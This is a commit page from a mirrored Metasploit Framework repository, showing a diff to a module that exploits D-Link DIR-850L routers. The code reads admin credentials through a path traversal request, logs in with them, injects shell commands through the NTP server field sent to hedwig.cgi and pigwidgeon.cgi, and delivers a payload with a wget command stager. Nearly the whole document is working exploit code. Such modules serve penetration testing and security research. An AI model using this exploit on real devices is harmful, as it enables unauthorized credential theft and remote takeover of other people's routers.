infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update dlink_850l_unauth_exec.rb

MS-2855/keylogger-mettle-extension
Austin 2017-11-03 06:21:59 -04:00 committed by GitHub
parent 5b7d803f85
commit af583e843c
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 15 additions and 25 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

40
modules/exploits/linux/http/dlink_850l_unauth_exec.rb
View File

@ -1,12 +1,7 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'openssl' require 'openssl'
class MetasploitModule < Msf::Exploit::Remote class MetasploitModule < Msf::Exploit::Remote
Rank = AverageRanking Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager include Msf::Exploit::CmdStager
@ -49,7 +44,7 @@ class MetasploitModule < Msf::Exploit::Remote
xml = "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n" xml = "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n"
xml << "<postxml>\r\n" xml << "<postxml>\r\n"
xml << "<module>\r\n" xml << "<module>\r\n"
xml << " <service>../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml</service>\r\n" xml << " <service>../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml</service>\r\n"
xml << "</module>\r\n" xml << "</module>\r\n"
xml << "</postxml>" xml << "</postxml>"
uid = rand_text_alpha_lower(8) uid = rand_text_alpha_lower(8)
@ -68,6 +63,7 @@ class MetasploitModule < Msf::Exploit::Remote
parse = res.get_xml_document parse = res.get_xml_document
username = parse.at('//name').text username = parse.at('//name').text
password = parse.at('//password').text password = parse.at('//password').text
vprint_status("#{peer} - Retrieved the username/password combo #{username}/#{password}")
return username, password return username, password
rescue ::Rex::ConnectionError rescue ::Rex::ConnectionError
fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.") fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.")
@ -89,31 +85,25 @@ class MetasploitModule < Msf::Exploit::Remote
end end
end end
def hash_passwd(username, password, challenge) def login
hash = OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('md5'), password.to_s, (username.to_s + challenge.to_s)).upcase username, password = retrieve_creds
return hash uid, challenge = retrieve_uid
end
def login(username, hash, uid)
begin begin
data = "id=#{username}&password=#{hash}" hash = OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('md5'), password.to_s, (username.to_s + challenge.to_s)).upcase
res = send_request_cgi({ res = send_request_cgi({
'uri' => '/authentication.cgi', 'uri' => '/authentication.cgi',
'method' => 'POST', 'method' => 'POST',
'data' => data, 'data' => "id=#{username}&password=#{hash}",
'cookie' => "uid=#{uid}" 'cookie' => "uid=#{uid}"
}) })
return res return uid
rescue ::Rex::ConnectionError rescue ::Rex::ConnectionError
fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.") fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.")
end end
end end
def execute_command(cmd, opts) def execute_command(cmd, opts)
username, password = retrieve_creds uid = login
uid, challenge = retrieve_uid
hash = hash_passwd(username, password, challenge)
login(username, hash, uid)
payload = "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n" payload = "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n"
payload << "<postxml>\r\n" payload << "<postxml>\r\n"
payload << "<module>\r\n" payload << "<module>\r\n"
@ -123,7 +113,7 @@ class MetasploitModule < Msf::Exploit::Remote
payload << " <ntp>\r\n" payload << " <ntp>\r\n"
payload << " <enable>1</enable>\r\n" payload << " <enable>1</enable>\r\n"
payload << " <period>604800</period>\r\n" payload << " <period>604800</period>\r\n"
payload << " <server>metelesku; (#{cmd};) &amp; exit; </server>\r\n" payload << " <server>#{Rex::Text.rand_text_alpha_lower(8)}; (#{cmd}) </server>\r\n"
payload << " </ntp>\r\n" payload << " </ntp>\r\n"
payload << " <ntp6>\r\n" payload << " <ntp6>\r\n"
payload << " <enable>1</enable>\r\n" payload << " <enable>1</enable>\r\n"
@ -140,13 +130,15 @@ class MetasploitModule < Msf::Exploit::Remote
payload << "</module>\r\n" payload << "</module>\r\n"
payload << "</postxml>" payload << "</postxml>"
begin begin
# save configuration
res = send_request_cgi({ res = send_request_cgi({
'uri' => '/hedwig.cgi', 'uri' => '/hedwig.cgi',
'method' => 'POST', 'method' => 'POST',
'ctype' => 'text/xml', 'ctype' => 'text/xml',
'data' => payload, 'data' => payload,
'cookie' => "uid=#{uid}" 'cookie' => "uid=#{uid}"
}) })
# execute configuration
res = send_request_cgi({ res = send_request_cgi({
'uri' => '/pigwidgeon.cgi', 'uri' => '/pigwidgeon.cgi',
'method' => 'POST', 'method' => 'POST',
@ -162,9 +154,7 @@ class MetasploitModule < Msf::Exploit::Remote
def exploit def exploit
print_status("#{peer} - Initiating exploitation...") print_status("#{peer} - Initiating exploitation...")
execute_cmdstager( execute_cmdstager(
:flavor => :wget, :flavor => :wget
:background => true,
:nodelete => true
) )
end end
end end